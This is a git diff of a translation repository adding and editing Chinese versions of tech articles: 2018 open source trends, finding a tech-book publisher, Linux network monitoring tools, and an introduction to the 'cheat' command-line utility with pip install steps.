![2018 年开源技术的 10 大发展趋势](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/fireworks-newyear-celebrate.png?itok=6gXaznov "10 open source technology trends for 2018")
|
||||
|
||||
图片来源:[Mitch Bennett][10]. [Opensource.com][31] 修改
|
||||
|
||||
科技一直在发展,诸如 OpenStack、PWA、Rust、R、认知云、人工智能(AI)、物联网等一些新技术正在颠覆我们对世界的固有认知。以下是 2018 年最可能成为主流的开源技术纲要。
|
||||
|
||||
### 1\. OpenStack 认可度持续高涨
|
||||
|
||||
[OpenStack][12] 本质上是一个云操作平台(系统),它为管理员提供直观友好的控制面板,以便对大量的计算、存储和网络资源进行配置和监管。
|
||||
|
||||
目前,很多企业运用 OpenStack 平台搭建和管理云计算系统。得益于其灵活的生态系统、透明度和运行速度,OpenStack 越来越流行。相比其他替代方案,OpenStack 只需更少的花费便能轻松支持任务关键型应用程序。
|
||||
但是,复杂的结构以及其对虚拟化、服务器、额外网络资源的严重依赖使得其它一些企业对使用 OpenStack 心存顾虑。另外,想要用好 OpenStack,好的硬件支持和高水平的员工二者缺一不可。
|
||||
|
||||
OpenStack 基金会一直在致力于完善他们的产品。不管发布与否的一些小的功能创新,都会解决 OpenStack 的潜在问题。随着其结构复杂性降低,OpenStack 将获取更大认可。加之众多大型软件开发和托管公司以及成千上万会员的支持, OpenStack 在云计算时代前途光明。
|
||||
|
||||
### 2\. PWA 或将大热
|
||||
|
||||
PWA,即 [增强型网页应用][13],是技术、设计和网络应用程序接口(web APIs)的集合,它能够在移动浏览器上提供类似应用程序的体验
|
||||
|
||||
传统的网页有许多与生俱来的缺点。虽然应用程序提供了一个比网页更加个性化、用户参与度更高的体验,但是却要占用大量的系统资源;并且要想使用应用,你还必须提前下载安装。PWA 则扬长避短,它为浏览器、可变引擎搜索框和其他一些操作作出响应,为用户提供应用程序般的体验。PWA 也能像应用程序一样自动更新显示最新的信息,基于网页的 HTTPS 模式又让其更加安全。PWA 运行于标准容器中,无须安装,只要输入 URL 即可。
|
||||
|
||||
现在的移动用户看重便利性和参与度,PWAs 的特性完美契合这一需求,所以 PWA 成为主流是必然趋势。
|
||||
|
||||
### 3\. Rust 成开发者新宠
|
||||
|
||||
大多数的编程语言都在安全性和控制二者之间折衷,[Rust][14] 是一个例外。Rust 使用广泛的编译时间检查进行 100% 的控制而不影响程序安全性。上一次 [Pwn2Own][15] 竞赛找出了 Firefox C++ 底层实现的许多严重漏洞。如果 Firefox 是用 Rust 编写的,这些漏洞在产品发布之前的编译阶段就会被发现并解决。
|
||||
|
||||
Rust 独特的内建单元测试方法使开发者们考虑将其作为首选开源语言。它是 C 和 Python 等其他编程语言有效的替代方案,Rust 可以在不丢失程序可读性的情况下写出安全的代码。总之,Rust 前途光明。
|
||||
|
||||
### 4\. R 用户群在壮大
|
||||
|
||||
[R][16] 编程语言,是一个与统计计算和图形呈现相关的 [GNU 项目][32]。它提供了大量的统计和图形技术,并且可扩展。它是 [S][17] 语言的延续。S 语言早已成为统计方法学的首选工具,R 为数据操作、计算和图形显示提供了开源选择。R 语言的另一个优势是对细节的把控和对细微差别的关注。
|
||||
|
||||
和 Rust 一样,R 语言也处于上升期。
|
||||
|
||||
### 5\. 广义的 XaaS
|
||||
|
||||
XaaS 是 ”一切都是服务“ 的缩写,是通过网络提供的各种线上服务的总称。XaaS 的外延正在扩大,软件服务(SaaS),基础设施服务(IaaS) 和平台服务(PaaS)等观念已深入人心,新兴的基于云的服务如网络服务(NaaS),存储服务(SaaS 或StaaS),监控服务(MaaS)以及通信服务(CaaS)等概念也正在普及。我们正在迈向一个 ”一切都是服务“ 的世界。
|
||||
|
||||
现在,XaaS 的概念已经延伸到实体企业。著名的例子有 Uber 、Lyft 和 Airbnb,前二者利用新科技提供交通服务,后者提供住宿服务。
|
||||
|
||||
高速网络和服务器虚拟化使得强大的计算能力成为可能,这加速了XaaS的发展,2018 年可能是 ”XaaS 年‘’。XaaS 无与伦比的灵活性、可扩展性将推动 XaaS 进一步发展。
|
||||
|
||||
### 6\. 容器技术越来越受欢迎
|
||||
|
||||
[容器技术][28],是用标准化方法打包代码的技术,它使得代码能够在任意环境中快速地 ”接入和运行“。容器技术使企业削减花费、更快运行程序。尽管容器技术在 IT 基础结构改革方面的潜力已经表现的很明显,事实上,运用好容器技术仍然是一个难题。
|
||||
|
||||
容器技术仍在发展中,技术复杂性随着各方面的进步在下降。最新的技术让容器使用起来像使用智能手机一样简单、直观,更不用说现在的企业需求:速度和灵活性往往能决定业务成败。
|
||||
|
||||
### 7\. 机器学习和人工智能的更广泛应用
|
||||
|
||||
[机器学习和人工智能][18] 指在没有程序员给出明确的编码指令的情况下,机器具备自主学习并且积累经验自我改进的能力。
|
||||
|
||||
随着一些开源技术利用机器学习和人工智能实现尖端服务和应用,这两项技术已经深入人心。
|
||||
|
||||
[Gartner][19] 预测,2018 年机器学习和人工智能的应用会更广。其他一些领域诸如数据准备、集成、算法选择、方法选择、模块制造等随着机器学习的加入将会取得很大进步。
|
||||
|
||||
全新的智能开源解决方案将改变人们和系统交互的方式,转变由来已久的工作观念。
|
||||
|
||||
* 机器交互,像[自助语音聊天程序][29]这样的对话平台,提供“问与答”的体验——用户提出问题,对话平台作出回应。
|
||||
* 无人驾驶和无人机现在已经家喻户晓了,2018年将会更司空见惯。
|
||||
* 沉浸式体验的应用不再仅仅局限于视频游戏,在真实的生活场景比如设计、培训和可视化过程中都能看到沉浸式体验的身影。
|
||||
|
||||
### 8. 数据区块链将成为主流
|
||||
|
||||
自比特币应用数据区块链技术以来,其已经取得了重大进展,并且已广泛应用在金融系统、保密选举、学历验证、等领域中。未来几年,区块链会在医疗、制造业、供应链物流、政府服务等领域中大展拳脚。
|
||||
|
||||
数据区块链分布式存储数据信息,这些数据信息依赖于数百万个共享数据库的节点。数据区块不被任意单一所有者控制,并且单个损坏的节点不影响其正常运行,数据区块链的这两个特性让它异常健康、透明、不可破坏。同时也规避了有人从中篡改数据的风险。数据区块链强大的先天优势足够支撑其成为将来主流技术。
|
||||
|
||||
### 9.认知云粉墨登场
|
||||
|
||||
认知技术,如前所述的机器学习和人工智能,用于为多行业提供简单化和个性化服务。一个典型例子是金融行业的游戏化应用,其为投资者提供严谨的投资建议,降低投资模块的复杂程度。数字信托平台使得金融机构的身份认证过程较以前精简 80%,提升了协议遵守率,降低了诈骗率。
|
||||
|
||||
认知云技术现在正向云端迁移,借助云,它将更加强大。[IBM Watson][33] 是认知云应用最知名的例子。IBM 的 UIMA 架构是开源的,由 Apache 负责维护。DARPA(美国国防高级研究计划局) 的 DeepDive 项目借鉴 Watson 的机器学习能力,通过不断学习人类行为来增强决断能力。另一个开源平台 [OpenCog][34] ,为开发者和数据科学家开发人工智能应用程序提供支撑。
|
||||
|
||||
考虑到实现先进的、个性化的用户体验风险较高,这些认知云平台决定来年时机成熟,再粉墨登场。
|
||||
|
||||
### 10.物联网智联万物
|
||||
|
||||
物联网(IoT)的核心在于建立小到嵌入式传感器、大至计算机设备的相互连接,让其(“事物”)相互之间可以收发数据。毫无疑问,物联网将会是科技届的下一个 “搅局者”,但物联网本身处于一个不断变化的状态。
|
||||
|
||||
物联网最广为人知的产品就是 IBM 和三星合力打造的去中心化P2P自动遥测系统([ADEPT][20])。它运用和区块链类似的技术来构建一个去中心化的物联网。没有中央控制设备,”事物“ 之间通过自主交流来进行升级软件、处理bug、管理电源等等一系列操作。
|
||||
|
||||
### 开源推动技术创新
|
||||
|
||||
[数字中断][30]是当今以科技为中心的时代的常态。在技术领域,开放源代码正在逐渐普及,其在2018将年成为大多数科技创新的驱动力。
|
||||
|
||||
此榜单对开源技术趋势的预测有遗漏?在评论区告诉我们吧!
|
||||
|
||||
*文章标签:* [ `商业` ][25] [ `年鉴` ][26] [ `2017开源年鉴` ][27]
|
||||
|
||||
### 关于作者
|
||||
|
||||
![Sreejith Omanakuttan](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/brain_2.jpg?itok=9PkPTyrV)
|
||||
|
||||
[**Sreejith Omanakuttan**][21] - 自 2000 年开始编程,2007年开始从事专业工作。目前在 [Fingent][6] 领导开源团队,工作内容涵盖不同的技术层面,从“无聊的工作”(?)到前沿科技。有一套 “构建—修复—推倒重来” 工作哲学。在领英上关注我:https://www.linkedin.com/in/futuregeek/
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
原文链接: https://opensource.com/article/17/11/10-open-source-technology-trends-2018
|
||||
|
||||
作者:[Sreejith ][a]
|
||||
译者:[wangy325](https://github.com/wangy25)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/sreejith
|
||||
[1]:https://opensource.com/resources/what-is-openstack?intcmp=7016000000127cYAAQ
|
||||
[2]:https://opensource.com/resources/openstack/tutorials?intcmp=7016000000127cYAAQ
|
||||
[3]:https://opensource.com/tags/openstack?intcmp=7016000000127cYAAQ
|
||||
[4]:https://www.rdoproject.org/?intcmp=7016000000127cYAAQ
|
||||
[5]:https://opensource.com/article/17/11/10-open-source-technology-trends-2018?rate=GJqOXhiWvZh0zZ6WVTUzJ2TDJBpVpFhngfuX9V-dz4I
|
||||
[6]:https://www.fingent.com/
|
||||
[7]:https://www.linkedin.com/in/futuregeek/
|
||||
[9]:https://opensource.com/user/185026/feed
|
||||
[10]:https://www.flickr.com/photos/mitchell3417/9206373620
|
||||
[11]:https://creativecommons.org/licenses/by-sa/4.0/
|
||||
[12]:https://www.openstack.org/
|
||||
[13]:https://developers.google.com/web/progressive-web-apps/
|
||||
[14]:https://www.rust-lang.org/
|
||||
[15]:https://en.wikipedia.org/wiki/Pwn2Own
|
||||
[16]:https://en.wikipedia.org/wiki/R_(programming_language)
|
||||
[17]:https://en.wikipedia.org/wiki/S_(programming_language)
|
||||
[18]:https://opensource.com/tags/artificial-intelligence
|
||||
[19]:https://sdtimes.com/gartners-top-10-technology-trends-2018/
|
||||
[20]:https://insights.samsung.com/2016/03/17/block-chain-mobile-and-the-internet-of-things/
|
||||
[21]:https://opensource.com/users/sreejith
|
||||
[22]:https://opensource.com/users/sreejith
|
||||
[23]:https://opensource.com/users/sreejith
|
||||
[24]:https://opensource.com/article/17/11/10-open-source-technology-trends-2018#comments
|
||||
[25]:https://opensource.com/tags/business
|
||||
[26]:https://opensource.com/tags/yearbook
|
||||
[27]:https://opensource.com/yearbook/2017
|
||||
[28]:https://www.techopedia.com/2/31967/trends/open-source/container-technology-the-next-big-thing
|
||||
[29]:https://en.wikipedia.org/wiki/Chatbot
|
||||
[30]:https://cio-wiki.org/home/loc/home?page=digital-disruption
|
||||
[31]:https://opensource.com/
|
||||
[32]:https://en.wikipedia.org/wiki/GNU_Project
|
||||
[33]:https://en.wikipedia.org/wiki/Watson_(computer)
|
||||
[34]:https://en.wikipedia.org/wiki/OpenCog
|
@ -0,0 +1,74 @@
|
||||
如何为你的科技书籍找到出版商
|
||||
============================================================
|
||||
|
||||
> 想去写一本科技书籍是一个好的想法,但你还需要去了解一下出版业的运作过程。
|
||||
|
||||
![How to find a publisher for your tech book](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/EDUCATION_colorbooks.png?itok=vNhsYYyC "How to find a publisher for your tech book")
|
||||
|
||||
你有一个写本科技书籍的想法,那么祝贺你!就像徒步旅行,或者是去学做一种甜点心,写一本书就像人们说的那些事情一样,但是却都只停留在思考的初级阶段。那是可以理解的,因为失败的几率是很高的。要想实现它你需要在把你的想法阐述给出版商,去探讨是否已经准备充分去写成一本书。要去实现这一步是相当困难的,但最困难的是你缺少如何完成它的足够信息。
|
||||
|
||||
如果你想和一个传统的出版商合作,你需要在他们面前推销你的书籍以期望能够得到出版的机会。我是 [Pragmatci Bookshelf][4] 的编辑主管,所以我经常看到很多的提案,也去帮助作者提议更好的主意。有些是好的,有些则不然,但我经常会看到许多不符合我们出版社风格的文稿。我会帮助你去选择最适合的出版商,来让你的想法得到认可。
|
||||
|
||||
### 鉴别出你的目标
|
||||
|
||||
你的第一步是要找出最适合你的想法的出版商。你可以从你较喜欢购买的书籍的出版商开始,你的书会被像你自己一样的人喜欢的几率是很高的,所以从你自己最喜欢的出版商开始将会大大缩小你的搜索范围。如果你自己所买的书籍并不多,你可以去书店逛逛,或者在亚马逊网站上看看。列一个你自己喜欢的出版商的清单出来。
|
||||
|
||||
下一步,挑选出你期望的,尽管大多数技术类出版商看起来没什么差别,但他们通常各有不同的读者群体。有些出版商会选择广受欢迎的话题,如 C++ 或者 Java。你以 Elixir 为主题的书籍就可能不适合那个出版商。如果你的书是关于教授小孩学习编程的,你可能就不想让学术出版商来出版。
|
||||
|
||||
一旦你已经鉴别出一些目标,在他们自己的网站或者亚马逊上对他们进行深一步的调查。 去寻找他们有哪些书籍是和你的思想是相符的。如果他们能有一本和你自己的书籍的主题一样或很相近的书,你将会很难说服他们和你签约。但那并不意味着你已经可以把这样的出版商从你的列表中划掉。你可以将你的书籍的主题进行适当的修改以将它和已经发行的书区别开来:比如定位于不同的读者群体,或者不同层次的技能水平。也许已发行的那本书已经过时了,你就可以专注于在该技术领域里的新方法。确保你的书籍能够弥补现有书的不足,更加完善,而不只是去写完这本书。
|
||||
|
||||
如果你锁定的出版商没有出版过类似的书籍,也许这将会是个好的机遇,但也许也会很糟糕。有时候一些供应商不会选择去出版一些专业技术方面的书籍,或者是因为他们认为他们的读者不会感兴趣,还可能是因为他们曾经在这块领域遇到过麻烦。新的语言或者类库一直在不停的涌现出来,出版商们不得不去琢磨什么样的书籍内容将会吸引他们的读者群体。他们的评估标准可能和你的是不一样的。唯一的途径是通过投稿来试探。
|
||||
|
||||
### 建立起你自己的网络
|
||||
|
||||
鉴别出一家出版商是第一步;现在你首先需要去建立联系。不幸的是,出版业你认识的人却往往不是你所需要找的人。你需要认识的那个人是一个去发现新市场、新作者和新选题的组稿编辑。如果你认识某个和出版商有关系的人,请他帮你介绍认识一位组稿编辑。这些组稿编辑往往负责一个专题板块,尤其是在较大的出版商,但你不必一定要找到符合你的书的专题板块的编辑。任何板块的编辑通常会很乐意将你介绍给符合你的主题的编辑。
|
||||
|
||||
有时候你也许能够在一个技术论坛展会上找到一个组稿编辑,特别是出版商是赞助商,而且还有一个展台时。即使在当时并没有一个组稿编辑在场,在展台的其他员工也能够帮你和组稿编辑建立联系。 如果论坛不符合你的主题思想,你需要利用你的社交网络来获得别人的推荐。使用 LinkedIn,或者其他非正式的联系方式,去和一个编辑建立联系。
|
||||
|
||||
对于小型的出版商,如果你很幸运的话,你可以在他们的公司网站上获得组稿编辑的联系方式。如果找不到联系方式的话,在推特上搜寻出版商的名字,试试能否找到他们的组稿编辑的信息,在社交媒体上去寻找一位陌生的人然后把自己的书推荐给他也许会让你有些紧张担心,但是你真的不必去担心这些,建立联系也是组稿编辑的工作之一。最坏的结果只不过是他们忽视你而已。
|
||||
|
||||
一旦你建立起联系,组稿编辑将会协助你进行下一步。他们可能会很快对你的书稿给予反馈,或者在他们考虑你的书之前想让你根据他们的指导来修改你的文章,当你经过努力找到了一名组稿编辑后,多听从他们的建议,因为他们比你更熟悉出版商的运作系统。
|
||||
|
||||
### 如果其它的方法都失败了
|
||||
|
||||
如果你无法找到一名组稿编辑,出版商通常会有一个<ruby>书稿盲投<rt>proposal alias</rt></ruby>的方式,通常是 `proposals@[publisher].com` 的格式。 查找他们网站的介绍找到如何去发送书稿;有的出版商是有特殊的要求的。遵循他们的要求,如果把你不这样做的话,你的书将会被丢弃,不会被任何人阅读。如果你有疑问,或者不确定出版商的意图,你需要再尝试着去找一名组稿编辑进一步的沟通,因为书稿并不能回答那些问题。整理他们对你的要求(一篇独立的主题文章),发给他们,然后就去期望能够得到满意的答复。
|
||||
|
||||
### 然后就是……等待
|
||||
|
||||
无论你和一个出版商有着多么密切的联系,你也得等待着。如果你已经投递了书稿,也许要过一段时间才有人去处理你的稿件,特别是在一些大公司。即使你已经找了一位组稿编辑去处理你的投稿,你可能也只是他同时在处理的潜在目标之一,所以你可能不会很快得到答复。几乎所有的出版商都会在最终确认之前召开一次组委会来决定接受哪个稿件,所以即使你的书稿已经足够的优秀可以出版了,你也任然需要等待组委会的最后探讨。你可能需要等待几周的时间,甚至是一个月的时间。
|
||||
|
||||
几周过后,你可以和编辑联系一下看看他们是否需要更多的信息。在邮件中你要表现出足够的礼貌;如果他们仍然回复,也许是因为他们有太多的投稿需要处理,即使你不停的催促也不会让你的稿件被提前处理。一些出版商有可能永远不会回复你,也不会去发一份退稿的通知给你,但那种情况并不常见。在这种情况系你除了耐心的等待也没有别的办法,如果几个月后也没有人回复你邮件,你完全可以去接触另一个出版商或者干脆考虑自己来出版。
|
||||
|
||||
### 好运气
|
||||
|
||||
如果这个过程看起来让你感觉有些混乱和不科学,这是很正常的。能够得到出版要依靠合适的地方、合适的时间,和合适的人探讨,而且还要期待他们此时有好的心情。你无法去控制这些不确定的因素,但是对出版社运作过程的熟悉,了解出版商们的需求,能够帮助你做出一个自己能掌控的最佳选择。
|
||||
|
||||
寻找一个出版商只是万里长征的第一步。你需要提炼你的想法并创建提案,以及其他方面的考虑。在今年的 SeaGLS 上,我对整个过程的介绍指导有个[演讲][5]。去看看那个[视频][6]获得更多的细节信息。
|
||||
|
||||
### 关于作者
|
||||
|
||||
[![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/portrait.jpg?itok=b77dlNC4)][7]
|
||||
|
||||
麦克唐纳先生现在是 Pragmatic Bookshelf 的主管编辑。在过去的 20 年里,在技术出版领域,他是一名编辑、一名作者、偶尔还去客串演讲者或者讲师。他现在把大量的时间都用来去和新作者探讨如何更好的表达出他们的想法。你可以关注他的推特@bmac_editor。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://opensource.com/article/17/12/how-find-publisher-your-book
|
||||
|
||||
作者:[Brian MacDonald][a]
|
||||
译者:[FelixYFZ](https://github.com/FelixYFZ)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/bmacdonald
|
||||
[1]:https://opensource.com/article/17/12/how-find-publisher-your-book?rate=o42yhdS44MUaykAIRLB3O24FvfWxAxBKa5WAWSnSY0s
|
||||
[2]:https://opensource.com/users/bmacdonald
|
||||
[3]:https://opensource.com/user/190176/feed
|
||||
[4]:https://pragprog.com/
|
||||
[5]:https://archive.org/details/SeaGL2017WritingTheNextGreatTechBook
|
||||
[6]:https://archive.org/details/SeaGL2017WritingTheNextGreatTechBook
|
||||
[7]:https://opensource.com/users/bmacdonald
|
||||
[8]:https://opensource.com/users/bmacdonald
|
||||
[9]:https://opensource.com/users/bmacdonald
|
||||
[10]:https://opensource.com/article/17/12/how-find-publisher-your-book#comments
|
@ -1,127 +0,0 @@
|
||||
Linux 中最佳的网络监视工具
|
||||
===============================
|
||||
|
||||
保持对我们的网络的管理,防止任何程序过度使用网络、导致整个系统操作变慢,对管理员来说是至关重要的。市面上有几个适用于不同操作系统的网络监视工具。在这篇文章中,我们将讨论从 Linux 终端中运行的 10 个网络监视工具。它对不使用 GUI 而希望通过 SSH 来保持对网络管理的用户来说是非常理想的。
|
||||
|
||||
### Iftop
|
||||
|
||||
[![iftop network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iftop_orig.png)][2]
|
||||
|
||||
与 Linux 用户经常使用的 Top 是非常类似的。这是一个系统监视工具,它允许我们知道在我们的系统中实时运行的进程,并可以很容易地管理它们。Iftop 与 Top 应用程序类似,但它是专门监视网络的,通过它可以知道更多的关于网络的详细情况和使用网络的所有进程。
|
||||
|
||||
我们可以从 [这个链接][3] 获取关于这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### Vnstat
|
||||
|
||||
[![vnstat network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/vnstat.png?1511885309)][4]
|
||||
|
||||
**Vnstat** 是一个缺省包含在大多数 Linux 发行版中的网络监视工具。它允许我们在一个用户选择的时间周期内获取一个实时管理的发送和接收的流量。
|
||||
|
||||
我们可以从 [这个链接][5] 获取关于这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### Iptraf
|
||||
|
||||
[![iptraf monitoring tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iptraf_orig.gif)][6]
|
||||
|
||||
**IPTraf** 是一个 Linux 的、基于控制台的、实时网络监视程序。(IP LAN) - 收集经过这个网络的各种各样的信息作为一个 IP 流量监视器,包括 TCP 标志信息、ICMP 详细情况、TCP / UDP 流量故障、TCP 连接包与字节计数。它也收集接口上全部的 TCP、UDP、…… 校验和错误、接口活动等等的详细情况。
|
||||
|
||||
我们可以从 [这个链接][7] 获取这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### Monitorix - 系统和网络监视
|
||||
|
||||
[![monitorix system monitoring tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/monitorix_orig.png)][8]
|
||||
|
||||
Monitorix 是一个轻量级的免费应用程序,它设计用于去监视尽可能多的 Linux / Unix 服务器的系统和网络资源。一个 HTTP web 服务器可以被添加到它里面,定期去收集系统和网络信息,并且在一个图表中显示它们。它跟踪平均的系统负载、内存分配、磁盘健康状态、系统服务、网络端口、邮件统计信息(Sendmail、Postfix、Dovecot、等等)、MySQL 统计信息以及其它的更多内容。它设计用于去管理系统的整体性能,以及帮助检测故障、瓶颈、异常活动、等等。
|
||||
|
||||
下载及更多 [信息在这里][9]。
|
||||
|
||||
### Dstat
|
||||
|
||||
[![dstat network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/dstat_orig.png)][10]
|
||||
|
||||
这个监视器相比前面的几个知名度低一些,但是,在一些发行版中已经缺省包含了。
|
||||
|
||||
我们可以从 [这个链接][11] 获取这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### Bwm-ng
|
||||
|
||||
[![bwm-ng monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bwm-ng_orig.png)][12]
|
||||
|
||||
这是最简化的工具中的一个。它允许你去从交互式连接中取得数据,并且,为了便于其它设备使用,在取得数据的同时,能以某些格式导出它们。
|
||||
|
||||
我们可以从 [这个链接][13] 获取这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### Ibmonitor
|
||||
|
||||
[![ibmonitor tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ibmonitor_orig.jpg)][14]
|
||||
|
||||
与上面的类似,它显示连接接口上过滤后的网络流量,并且,从接收到的流量中明确地区分出发送流量。
|
||||
|
||||
我们可以从 [这个链接][15] 获取这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### Htop - Linux 进程跟踪
|
||||
|
||||
[![htop linux processes monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/htop_orig.png)][16]
|
||||
|
||||
Htop 是一个更高级的、交互式的、实时的 Linux 进程跟踪工具。它类似于 Linux 的 top 命令,但是有一些更高级的特性,比如,一个更易于使用的进程管理接口、快捷键、水平和垂直的进程视图、等更多特性。Htop 是一个第三方工具,它不包含在 Linux 系统中,你必须使用 **YUM** 或者 **APT-GET** 或者其它的包管理工具去安装它。关于安装它的更多信息,读[这篇文章][17]。
|
||||
|
||||
我们可以从 [这个链接][18] 获取这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### Arpwatch - 以太网活动监视器
|
||||
|
||||
[![arpwatch ethernet monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arpwatch_orig.png)][19]
|
||||
|
||||
Arpwatch 是一个设计用于在 Linux 网络中去管理以太网通讯的地址解析的程序。它持续监视以太网通讯并记录 IP 地址和 MAC 地址的变化。在一个网络中,它们的变化同时伴随记录一个时间戳。它也有一个功能是当一对 IP 和 MAC 地址被添加或者发生变化时,发送一封邮件给系统管理员。在一个网络中发生 ARP 攻击时,这个功能非常有用。
|
||||
|
||||
我们可以从 [这个链接][20] 获取这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### Wireshark - 网络监视工具
|
||||
|
||||
[![wireshark network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/how-to-use-wireshark_1.jpg?1512299583)][21]
|
||||
|
||||
**[Wireshark][1]** 是一个免费的应用程序,它允许你去捕获和查看前往你的系统和从你的系统中返回的信息,它可以去深入到通讯包中并查看每个包的内容 – 分开它们来满足你的特殊需要。它一般用于去研究协议问题和去创建和测试程序的特别情况。这个开源分析器是一个被公认的分析器商业标准,它的流行是因为纪念那些年的荣誉。
|
||||
|
||||
Wireshark 最初被称为 Ethereal,它有轻量化的、易于理解的界面,能分类显示来自不同的真实系统上的协议信息。
|
||||
|
||||
### 结论
|
||||
|
||||
在这篇文章中,我们看了几个开源的网络监视工具。由于我们从这些工具中挑选出来的认为是“最佳的”,并不意味着它们都是最适合你的需要的。例如,现在有很多的开源监视工具,比如,OpenNMS、Cacti 和 Zenoss,并且,你需要去从你的个体情况考虑它们的每个工具的优势。
|
||||
|
||||
另外,还有不同的、更适合你的需要的不开源的工具。
|
||||
|
||||
你知道的或者使用的在 Linux 终端中的更多网络监视工具还有哪些?
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: http://www.linuxandubuntu.com/home/best-network-monitoring-tools-for-linux
|
||||
|
||||
作者:[LinuxAndUbuntu][a]
|
||||
译者:[qhwdw](https://github.com/qhwdw)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://www.linuxandubuntu.com
|
||||
[1]:https://www.wireshark.org/
|
||||
[2]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iftop_orig.png
|
||||
[3]:http://www.ex-parrot.com/pdw/iftop/
|
||||
[4]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/vnstat.png
|
||||
[5]:http://humdi.net/vnstat/
|
||||
[6]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iptraf_orig.gif
|
||||
[7]:http://iptraf.seul.org/
|
||||
[8]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/monitorix_orig.png
|
||||
[9]:http://www.monitorix.org
|
||||
[10]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/dstat_orig.png
|
||||
[11]:http://dag.wiee.rs/home-made/dstat/
|
||||
[12]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bwm-ng_orig.png
|
||||
[13]:http://sourceforge.net/projects/bwmng/
|
||||
[14]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ibmonitor_orig.jpg
|
||||
[15]:http://ibmonitor.sourceforge.net/
|
||||
[16]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/htop_orig.png
|
||||
[17]:http://wesharethis.com/knowledgebase/htop-and-atop/
|
||||
[18]:http://hisham.hm/htop/
|
||||
[19]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arpwatch_orig.png
|
||||
[20]:http://linux.softpedia.com/get/System/Monitoring/arpwatch-NG-7612.shtml
|
||||
[21]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/how-to-use-wireshark_1_orig.jpg
|
||||
|
||||
|
@ -1,48 +1,37 @@
|
||||
translating---geekpi
|
||||
|
||||
Cheat – A Collection Of Practical Linux Command Examples
|
||||
Cheat - 一个实用 Linux 命令示例集合
|
||||
======
|
||||
Many of us very often checks **[Man Pages][1]** to know about command switches
|
||||
(options), it shows you the details about command syntax, description,
|
||||
details, and available switches but it doesn 't has any practical examples.
|
||||
Hence, we are face some trouble to form a exact command format which we need.
|
||||
我们中的许多人经常查看 **[ man 页面][1]** 来了解命令开关(选项),它会显示有关命令语法、说明、细节和可用的选项,但它没有任何实际的例子。因此,在组合成一个完整的我们需要的命令时会遇到一些麻烦。
|
||||
|
||||
Are you really facing the trouble on this and want a better solution? i would
|
||||
advise you to check about cheat utility.
|
||||
你确实遇到这个麻烦而想要一个更好的解决方案吗?我会建议你试一下 cheat。
|
||||
|
||||
#### What Is Cheat
|
||||
#### Cheat 是什么
|
||||
|
||||
[Cheat][2] allows you to create and view interactive cheatsheets on the
|
||||
command-line. It was designed to help remind *nix system administrators of
|
||||
options for commands that they use frequently, but not frequently enough to
|
||||
remember.
|
||||
[cheat][2] 允许你在命令行中创建和查看交互式 cheatsheet。它旨在帮助提醒 *nix 系统管理员
|
||||
他们经常使用但还没频繁到会记住的命令的选项。
|
||||
|
||||
#### How to Install Cheat
|
||||
#### 如何安装 Cheat
|
||||
|
||||
Cheat package was developed using python, so install pip package to install
|
||||
cheat on your system.
|
||||
cheat 是使用 python 开发的,所以用 pip 来在你的系统上安装 cheat。
|
||||
|
||||
For **`Debian/Ubuntu`** , use [apt-get command][3] or [apt command][4] to
|
||||
install pip.
|
||||
对于 **`Debian/Ubuntu`** 用户,请使用[ apt-get 命令][3]或[ apt 命令][4]来安装 pip。
|
||||
|
||||
```
|
||||
|
||||
[For Python2]
|
||||
[对于 Python2]
|
||||
|
||||
|
||||
$ sudo apt install python-pip python-setuptools
|
||||
|
||||
|
||||
|
||||
[For Python3]
|
||||
[对于 Python3]
|
||||
|
||||
|
||||
$ sudo apt install python3-pip
|
||||
|
||||
```
|
||||
|
||||
pip doesn't shipped with **`RHEL/CentOS`** system official repository so,
|
||||
enable [EPEL Repository][5] and use [YUM command][6] to install pip.
|
||||
